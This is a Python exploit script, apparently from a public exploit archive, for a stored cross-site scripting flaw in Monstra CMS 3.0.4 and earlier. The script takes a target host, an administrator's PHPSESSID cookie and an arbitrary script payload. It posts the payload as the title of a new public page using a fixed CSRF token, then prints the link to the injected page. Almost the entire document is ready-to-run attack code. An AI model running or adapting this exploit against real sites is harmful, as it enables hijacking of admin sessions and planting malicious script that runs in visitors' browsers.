55 lines
No EOL
1.8 KiB
Python
Executable file
55 lines
No EOL
1.8 KiB
Python
Executable file
# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
|
|
# Date: 2018-06-07
|
|
# Author: DEEPIN2
|
|
# Software: Monstra CMS
|
|
# Version: 3.0.4 and earlier
|
|
# This automation code requires Python3
|
|
# You must intercept the first request through the proxy tool to verify the CSRF token.
|
|
|
|
import requests
|
|
import re
|
|
|
|
def runXSS(target, cookie, data):
|
|
exploit = requests.post(target, cookies=cookie, data=data).text
|
|
if re.search('exploit', exploit):
|
|
return 'OK'
|
|
else:
|
|
return 'ERROR'
|
|
|
|
if __name__ == '__main__':
|
|
print(''' ______ _______ ____ ___ _ ___ _ ___ _ _ ___
|
|
/ ___\ \ / / ____| |___ \ / _ \/ |( _ ) / |/ _ \/ / |( _ )
|
|
| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
|
|
| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
|
|
\____| \_/ |_____| |_____|\___/|_|\___/ |_|\___/|_|_|\___/
|
|
[*] Author : DEEPIN2(Junseo Lee)
|
|
---------------------------------------------------------------------''')
|
|
print('[*] Ex) http://www.target.com -> www.target.com')
|
|
url = input('Target : ')
|
|
print('[*] Required admin\'s PHPSESSID.')
|
|
PHPSESSID = input('PHPSESSID : ')
|
|
pagename = input('Pagename : ')
|
|
script = input('Script : ')
|
|
target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
|
|
cookie = {'PHPSESSID':PHPSESSID}
|
|
data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
|
|
'page_title':script,\
|
|
'page_name':pagename,\
|
|
'page_meta_title':'',\
|
|
'page_keywords':'',\
|
|
'page_description':'',\
|
|
'pages':0,\
|
|
'templates':'index',\
|
|
'status':'published',\
|
|
'access':'public',\
|
|
'editor':'',\
|
|
'page_tags':'',\
|
|
'add_page_and_exit':'Save+and+Exit',\
|
|
'page_date':'9999-99-99'}
|
|
|
|
result = runXSS(target, cookie, data)
|
|
print('-' * 69)
|
|
if result == 'OK':
|
|
print('[+] LINK : http://' + url + '/' + pagename)
|
|
else:
|
|
print('[-] Error') |